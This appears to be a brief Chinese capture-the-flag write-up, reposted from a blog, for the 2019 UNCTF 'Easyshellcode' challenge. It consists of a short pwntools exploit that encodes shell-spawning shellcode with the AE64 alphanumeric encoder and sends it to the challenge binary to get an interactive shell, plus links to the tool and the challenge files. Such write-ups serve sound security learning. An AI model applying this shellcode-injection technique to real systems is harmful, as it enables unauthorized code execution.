2019UNCTF

Easyshellcode:

不说了,都是没有工具的血泪史,直接上exp:

from pwn import *
from numbers import *
from ae64 import AE64
context.log_level = 'debug'

p = process('./pwn')
p.recvuntil('say?\n')
obj = AE64()
sc = obj.encode(asm(shellcraft.sh()))
p.sendline(sc)
p.interactive()

工具连接:https://github.com/veritas501/ae64

题目附件:https://github.com/countfatcode/countfatcode.github.io/tree/master/%E9%A2%98%E7%9B%AE/2019UNCTF/easyshellcode

猜你喜欢

转载自www.cnblogs.com/countfatcode/p/11839695.html